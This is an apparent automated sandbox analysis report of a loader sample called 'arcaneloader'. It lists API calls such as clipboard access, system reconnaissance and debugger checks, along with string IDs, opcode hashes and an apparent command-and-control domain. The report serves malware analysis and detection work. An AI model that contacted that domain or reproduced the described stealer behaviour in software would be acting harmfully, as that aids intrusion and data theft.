2034 42f210-42f219 2033->2034 2034->2032 2034->2034
                                                                          APIs
                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042EEE5
                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042EFB4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ComputerName
                                                                          • String ID:
                                                                          • API String ID: 3545744682-0
                                                                          • Opcode ID: c78054440fc6fa620e110cda238c21fa9360611582a36aabe5a335869c3c765e
                                                                          • Instruction ID: e67a81b80360b9f6f588464472b5b98559d84c06fcd0e34811145894dce683d9
                                                                          • Opcode Fuzzy Hash: c78054440fc6fa620e110cda238c21fa9360611582a36aabe5a335869c3c765e
                                                                          • Instruction Fuzzy Hash: 0BB1E3706047828FE7158F36D460B72BBE2AF53304F5884AEC0D69B393DB799846CB25
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: 9$[
                                                                          • API String ID: 2994545307-425942895
                                                                          • Opcode ID: 30ab1c8e28123abced1a10eed1accd3c716931f4c82e7583eda91f091223b750
                                                                          • Instruction ID: a9c36e03228082b36eb96f6119028850001021d7bd2f328d3d98c6a395f82d3b
                                                                          • Opcode Fuzzy Hash: 30ab1c8e28123abced1a10eed1accd3c716931f4c82e7583eda91f091223b750
                                                                          • Instruction Fuzzy Hash: 18B17A72B183618BD7148E24E8812AB77D2EFD5314F98C53EE8898B341D63CDC46C39A
                                                                          Strings
                                                                          • D1DAEAD3B896F67BD8DCFC0BCFF02CE4, xrefs: 0040D4DE
                                                                          • frogs-severz.sbs, xrefs: 0040D8FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: D1DAEAD3B896F67BD8DCFC0BCFF02CE4$frogs-severz.sbs
                                                                          • API String ID: 0-3985567380
                                                                          • Opcode ID: e9397d0ad6c990278152fe6454d4560b7b69b6de74d3f2336e4d9f898f8025f3
                                                                          • Instruction ID: 1624ccc56d8b69c04fb1cbd002dacc3c878cac572421a71ee09f7bdf46ef3427
                                                                          • Opcode Fuzzy Hash: e9397d0ad6c990278152fe6454d4560b7b69b6de74d3f2336e4d9f898f8025f3
                                                                          • Instruction Fuzzy Hash: 04B1D2B591E3C08BD331CF2898907DBBBE1AFDA314F18896DD4C99B395DA35440ACB46
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: @$X\
                                                                          • API String ID: 2994545307-656782640
                                                                          • Opcode ID: a8ca74f0b8a9222c990306c37e9c7a5ca9ae00f80c3c8dd6df592b2388385b39
                                                                          • Instruction ID: 29cceeb6dee9158ca5a37882d95d597edbe1ce64c7c6c7953c086eb30502129f
                                                                          • Opcode Fuzzy Hash: a8ca74f0b8a9222c990306c37e9c7a5ca9ae00f80c3c8dd6df592b2388385b39
                                                                          • Instruction Fuzzy Hash: BE3156765183049BC304DF18C8C066BBBE5FFD9310F55892DE98887390E7B99908C75A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Eg:e$dc
                                                                          • API String ID: 0-2477354281
                                                                          • Opcode ID: 446ccf7749d00ac099776b3865edea6ac9cf1376c4734ade4665d1c1043cedfd
                                                                          • Instruction ID: 00cb38564071228128a8e0ce01af026fce47a09590bc48c059c93e4fb5950253
                                                                          • Opcode Fuzzy Hash: 446ccf7749d00ac099776b3865edea6ac9cf1376c4734ade4665d1c1043cedfd
                                                                          • Instruction Fuzzy Hash: B72125379083508FD720CF54C88176BB7A1EBD6714F19852CEACA77281D379E80B8B89
                                                                          APIs
                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F79E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                          • String ID:
                                                                          • API String ID: 3960555810-0
                                                                          • Opcode ID: c700badfd8ad3b95f444d5be6bf6d8505af29bc01c7444bceaa76480fa4af0b1
                                                                          • Instruction ID: 3ff10f63a2e1305b59b3b08122994c3cfc54dc3f345c2e7657d08e55cf3a99fe
                                                                          • Opcode Fuzzy Hash: c700badfd8ad3b95f444d5be6bf6d8505af29bc01c7444bceaa76480fa4af0b1
                                                                          • Instruction Fuzzy Hash: 39C1E5756047928FE315CF29C450722FBE2BF56300F6885AEC4DA8B792C779E846CB54
                                                                          APIs
                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F79E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                          • String ID:
                                                                          • API String ID: 3960555810-0
                                                                          • Opcode ID: cf9cedbe5de86419d105d76727cc81a6fcb5d7552176dfadf4df2bd2e7934b03
                                                                          • Instruction ID: 38ffefb4ebd65664b17ba973511349a7435345d105f14330814fe97eb206fa05
                                                                          • Opcode Fuzzy Hash: cf9cedbe5de86419d105d76727cc81a6fcb5d7552176dfadf4df2bd2e7934b03
                                                                          • Instruction Fuzzy Hash: 98B1F1756047828FE319CF29D050722FBE1AF96300F6885BEC4DA8B792C779D846CB44
                                                                          APIs
                                                                          • LdrInitializeThunk.NTDLL(00441E5D,005C003F,00000018,?,?,00000018,?,?,?), ref: 0043F4CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: @
                                                                          • API String ID: 2994545307-2766056989
                                                                          • Opcode ID: 34c8de6352c863dc2522a77f1473af924fb0f12f2f52fa211f15d2cbc6d63c74
                                                                          • Instruction ID: a8dbdbc5700a8c6e023359f47cb9c9ea8156e3f6febc5815d51c328794099f6a
                                                                          • Opcode Fuzzy Hash: 34c8de6352c863dc2522a77f1473af924fb0f12f2f52fa211f15d2cbc6d63c74
                                                                          • Instruction Fuzzy Hash: 8C4189B59143008BE704CF28C88076BB7E1FFD4328F14C22EE999573A1E7798949C78A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: w%r'
                                                                          • API String ID: 0-1361669421
                                                                          • Opcode ID: ab76e7b43a02a3a54cbeba7acdf0484787f6e51fafd38beaaa350cb199addc32
                                                                          • Instruction ID: d981a9ddf46fd9b10f14a1a6aa5ae6bfa68ba1020d02be8d4138c48014b6e845
                                                                          • Opcode Fuzzy Hash: ab76e7b43a02a3a54cbeba7acdf0484787f6e51fafd38beaaa350cb199addc32
                                                                          • Instruction Fuzzy Hash: 902123B6E155529BD719CF34CC82BB67BA2AF96301F18C1ADD451AB389DB38A8018744
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 124673cfcf7b16fe1551a151f29d16a27aa2596d08743f7277e2ad2e8d06b373
                                                                          • Instruction ID: 14bc28572da6d8f33c8896025a3aa771921f02f29064102e0cff857034dbbe17
                                                                          • Opcode Fuzzy Hash: 124673cfcf7b16fe1551a151f29d16a27aa2596d08743f7277e2ad2e8d06b373
                                                                          • Instruction Fuzzy Hash: 7751477AB592044BD718DE28DD9223BB3D3F7D9310F1DA83ED285C7361DA79C80A8609
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8d9bf68de6d1f1556af54cba56035c290fed483bd9f891f364ccf7e2853621a3
                                                                          • Instruction ID: ac807d34ba04e7072c8a56d5842675913102a0ce8896ab1543b1c7ce6660c741
                                                                          • Opcode Fuzzy Hash: 8d9bf68de6d1f1556af54cba56035c290fed483bd9f891f364ccf7e2853621a3
                                                                          • Instruction Fuzzy Hash: 8F2137B0D417008FD710CF69C88636BBFF2AF92300F049A1DD5826B389DB34940A8B96

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 004402C4
                                                                          • GetForegroundWindow.USER32 ref: 004402E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ForegroundWindow
                                                                          • String ID:
                                                                          • API String ID: 2020703349-0
                                                                          • Opcode ID: 03df0c434e0f2edc8fcbd5723e694d4ab9fdc4b451e61c78315aea14334cf539
                                                                          • Instruction ID: 308ce0982416377843033589ef9fddac6d1aed95c9c06d5d0cff9a40955c546e
                                                                          • Opcode Fuzzy Hash: 03df0c434e0f2edc8fcbd5723e694d4ab9fdc4b451e61c78315aea14334cf539
                                                                          • Instruction Fuzzy Hash: 82E086BEE9250157BB049F22BC5E41A77A79ACA27935DC03BEC0743332D9395806455A
                                                                          APIs
                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043F465
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: ac74671588dabdca079eb4d48b1c552120bf0ee76838a0db45a6b760b35429b4
                                                                          • Instruction ID: 83d7303d132f686615630e1bde303aca3a3e38477d6c532dd896a5cc0965e201
                                                                          • Opcode Fuzzy Hash: ac74671588dabdca079eb4d48b1c552120bf0ee76838a0db45a6b760b35429b4
                                                                          • Instruction Fuzzy Hash: AE11CC247893008BD3045FB9FCD672FB796DBE9208F0CC53CE58053741E0B9980842A2
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043CA33
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: 64caad144b1c4e501634561f81b53baee2ca27bfe72f0b0cae11cb6cb70dbc3e
                                                                          • Instruction ID: 2c0cad0134e4334fa5ea67d5b3d2f54fed67c46c54ec9c3b576891f804759357
                                                                          • Opcode Fuzzy Hash: 64caad144b1c4e501634561f81b53baee2ca27bfe72f0b0cae11cb6cb70dbc3e
                                                                          • Instruction Fuzzy Hash: A6F04C326043609BD3009A79EC9462BBB959FD8309F16047CD6C45B752C2616C85C7D1
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043CA97
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 91d660524c1988290485c26822d51e856f117acc356d9f7178c7e388ca9a924a
                                                                          • Instruction ID: 1bbe7ab3876c1027b851958274a4320012bfd76b9c07cde43f457aafcd9c7663
                                                                          • Opcode Fuzzy Hash: 91d660524c1988290485c26822d51e856f117acc356d9f7178c7e388ca9a924a
                                                                          • Instruction Fuzzy Hash: 41F0E23050D3518BD708EB24EC6562B7BA5EF8A304F00447CE4C15BAA1D7359C66CB9A
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: BlanketProxy
                                                                          • String ID:
                                                                          • API String ID: 3890896728-0
                                                                          • Opcode ID: 10b254e305cadbe1ee718478ddd43fd77cf34410c1f74749065b85f307694c66
                                                                          • Instruction ID: 02a9e40ba7be08156986cab49d8282f2ba67918da0d7444cf4fc89946d6b71a1
                                                                          • Opcode Fuzzy Hash: 10b254e305cadbe1ee718478ddd43fd77cf34410c1f74749065b85f307694c66
                                                                          • Instruction Fuzzy Hash: DD0119B56087028FD310CF64C59878BBBF1BB85308F148A2CD4A44B385C3B5A9098BC2
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: BlanketProxy
                                                                          • String ID:
                                                                          • API String ID: 3890896728-0
                                                                          • Opcode ID: d1315ec646141fbbe38fd6d96f1a5a54a8e1c329d4d810a9ca37667e376e366a
                                                                          • Instruction ID: 4fc6e489faa499a16ccd8498f584143537a9804042b1cee9d14eba7c0c67b8df
                                                                          • Opcode Fuzzy Hash: d1315ec646141fbbe38fd6d96f1a5a54a8e1c329d4d810a9ca37667e376e366a
                                                                          • Instruction Fuzzy Hash: 1DF0F4B56097028FE341DF24C55870BBBE2AFC4314F15C92CD0A44B250C7B5AA498FC2
                                                                          APIs
                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D433
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Initialize
                                                                          • String ID:
                                                                          • API String ID: 2538663250-0
                                                                          • Opcode ID: 1a6fc54e296de0e76084524e37aeb2d22158072ee3ef2458d4d6966a4addd3f8
                                                                          • Instruction ID: bc2d5c8ccf80ca35f76dc3ca6851e8142d581e8c624321266dc9dd25c4f3caf0
                                                                          • Opcode Fuzzy Hash: 1a6fc54e296de0e76084524e37aeb2d22158072ee3ef2458d4d6966a4addd3f8
                                                                          • Instruction Fuzzy Hash: E6D02E21A201406BC248AF28EC1AF2B36A88B43720F00423EF192862D2E8402801C169
                                                                          APIs
                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D467
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeSecurity
                                                                          • String ID:
                                                                          • API String ID: 640775948-0
                                                                          • Opcode ID: f7b07c0e3be99b0715acbace52ef5f9bc639f542bc87ecc570773fe60fafbe11
                                                                          • Instruction ID: f3bf5f837fd68a82e90e8a77911c1afe5dbb849adfd9fedab2ea578a000d2b4d
                                                                          • Opcode Fuzzy Hash: f7b07c0e3be99b0715acbace52ef5f9bc639f542bc87ecc570773fe60fafbe11
                                                                          • Instruction Fuzzy Hash: 29D0C9343D434177F5749B58AC17F1432116702F19F70022DB362FE2E1C9E17111860C
                                                                          APIs
                                                                          • GetUserDefaultUILanguage.KERNELBASE ref: 00438D33
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DefaultLanguageUser
                                                                          • String ID:
                                                                          • API String ID: 95929093-0
                                                                          • Opcode ID: 4f4a191404c1a0a90f98239bbdab5a7c7de1bc49763215159fc222961b702178
                                                                          • Instruction ID: 1597f93415ba76b45e2379b7cd35b38206cc43c2387d41908b411d3ebd4f8930
                                                                          • Opcode Fuzzy Hash: 4f4a191404c1a0a90f98239bbdab5a7c7de1bc49763215159fc222961b702178
                                                                          • Instruction Fuzzy Hash: 48D05B797545148FCB0CCF24D8709B9337367DC30471942DCD406977E8CA3668418E40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                          • String ID: <$A
                                                                          • API String ID: 2832541153-570643782
                                                                          • Opcode ID: b6f2db5deef401d058ea4ca1606ea0b9c6549fa0149badb2afbcf4ad633a2131
                                                                          • Instruction ID: 66586401b89f7177643c5cc3b3fa588df4bdf571baeae46f27f253fe84e68a5c
                                                                          • Opcode Fuzzy Hash: b6f2db5deef401d058ea4ca1606ea0b9c6549fa0149badb2afbcf4ad633a2131
                                                                          • Instruction Fuzzy Hash: 9441847150CB918ED310EF7C944831EBFE06B96318F045E2EE4D586392D678C589C7A7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4Zp$#e$&(.&$)4Zp$D1DAEAD3B896F67BD8DCFC0BCFF02CE4$W@MB$Xf$[l$_V
                                                                          • API String ID: 0-4067205873
                                                                          • Opcode ID: a418ef97778dc270beb5e185ee183adaaab223b683cd498e3f4a90c9c2edd22c
                                                                          • Instruction ID: dba41d186d2f407764325aac85cbee23a09c659dc4c446e550b11e42dc22a80c
                                                                          • Opcode Fuzzy Hash: a418ef97778dc270beb5e185ee183adaaab223b683cd498e3f4a90c9c2edd22c
                                                                          • Instruction Fuzzy Hash: 4BC1D1B150C3808BD714DF24D85476FBBE1EBD1318F18896DE0D59B2A2DB79880ACB97
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: &"+,$+ !2$;4<$BF]A$CTAR$Dsmm$LK]T$WZXt
                                                                          • API String ID: 0-3527187124
                                                                          • Opcode ID: 7c40596922575adb2117f6a1073f23af2d257e24bd6b121a766358452f245d46
                                                                          • Instruction ID: 18eb1f2800720856e24a9b7a6ea0ca0b864844965be1c9965287baf453c83f12
                                                                          • Opcode Fuzzy Hash: 7c40596922575adb2117f6a1073f23af2d257e24bd6b121a766358452f245d46
                                                                          • Instruction Fuzzy Hash: E022BCB4900B418FD325AF39D152762BFB0BF52300F148A9ED4EA4F796D734A44ACB96
                                                                          APIs
                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DCC8CB
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: f049189f908545e71f67416e0a9471b7230c3c2dd42f5c47a6009409f9a7b753
                                                                          • Instruction ID: 5ddf2208ecfc2a4fc0931824b656a7ddc5fcfba4bd5162f343638d3f38c0bac7
                                                                          • Opcode Fuzzy Hash: f049189f908545e71f67416e0a9471b7230c3c2dd42f5c47a6009409f9a7b753
                                                                          • Instruction Fuzzy Hash: 9871CE7191111A9EDF20EF688C89FAAB7B9EF05300F1851DEE10DA3251DB308E859F30
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DC5450
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00DC551C
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DC553C
                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00DC5546
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                          • String ID:
                                                                          • API String ID: 254469556-0
                                                                          • Opcode ID: 37ca52e7f5dba9f1535517595aa9e9d48c57f2a7f24790d7c59d5cda4b958393
                                                                          • Instruction ID: abd9c17fe3df3afeb6e1b5575741886617d8e56be2d5e318dc87060fd01a6336
                                                                          • Opcode Fuzzy Hash: 37ca52e7f5dba9f1535517595aa9e9d48c57f2a7f24790d7c59d5cda4b958393
                                                                          • Instruction Fuzzy Hash: CB311875D053199BDF10EFA4D989BCDBBB8BF08304F1040AAE40DAB251EB719A85CF25
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 202*$>,?&$Mg$sv
                                                                          • API String ID: 0-1101154962
                                                                          • Opcode ID: c84503fa2a97d4211ab73f1962e00eb962ff49d4d6ad595b8568eb3b31fb82a7
                                                                          • Instruction ID: 1f44fdec08a6881f24adacd1673dcff61ec64bed8c783c4f794dd1ffef6f03de
                                                                          • Opcode Fuzzy Hash: c84503fa2a97d4211ab73f1962e00eb962ff49d4d6ad595b8568eb3b31fb82a7
                                                                          • Instruction Fuzzy Hash: 45221279608391DFD300DF28E88176FBBE1AB86304F448A2DF4D187292D779D905CB9A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: om$)<u+$72?1$yIFC
                                                                          • API String ID: 0-3154914813
                                                                          • Opcode ID: 2243309d31287b0474ba46d843cfae1acb6dba4d2a6a9c58f00758f3f8e42bef
                                                                          • Instruction ID: 617c2b7e5c17353192a0bc8726c580bc25781a609e86d05a9b4c6cde2c18c5b0
                                                                          • Opcode Fuzzy Hash: 2243309d31287b0474ba46d843cfae1acb6dba4d2a6a9c58f00758f3f8e42bef
                                                                          • Instruction Fuzzy Hash: 40F147B5A082518FC7148F29E8513ABB7E1EF96304F58886EE4C5C7382D739DD06CB5A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: JI(3$JI(3$eI(3$eI(3
                                                                          • API String ID: 0-20053117
                                                                          • Opcode ID: fe4ac2854252fc63479e4feacf4aa02c5fe11cf8412e98fd21b24df48d9fae3b
